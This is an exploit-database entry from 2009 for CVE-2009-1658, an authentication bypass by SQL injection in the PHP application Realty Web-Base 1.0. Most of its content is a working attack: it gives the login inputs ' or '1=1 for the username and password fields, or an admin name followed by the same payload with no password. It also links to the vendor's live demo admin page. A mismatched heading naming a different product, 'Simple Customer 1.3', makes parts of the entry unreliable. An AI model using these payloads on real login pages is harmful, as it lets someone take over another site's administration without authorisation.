Realty Web-Base 1.0 - Authentication Bypass
Author: ThE g0bL!N
type: webapps
platform: php
port:
date_added: 2009-05-07
date_updated:
verified: 1
codes: OSVDB-54372;CVE-2009-1658
tags:
aliases:
screenshot_url:
application_url:
---------------------------------------------------------------
------------------------------------------------------------
Realty Web-Base v1.0 (Auth bypass) SQL Injection Vulnerability
---------------------------------------------------------------
Founder : ThE g0bL!N
Home:WwW.h4ckF0u.CoM
Vendor:http://www.realtywebware.com
---------------------------------------------------------------
---------------------------------------------------------------
Simple Customer 1.3 SQL Injection Vulnerability
------------------------------------------------
username :' or '1=1
Password: ' or '1=1
Or
username:[admin_name]' or '1=1
password: Nothing
--------------------------------------
Dem0
----
http://www.realtywebware.com/demo/admin/
--------------------------------------
Greeting To ALL My Friends (Dz)
# milw0rm.com [2009-05-08]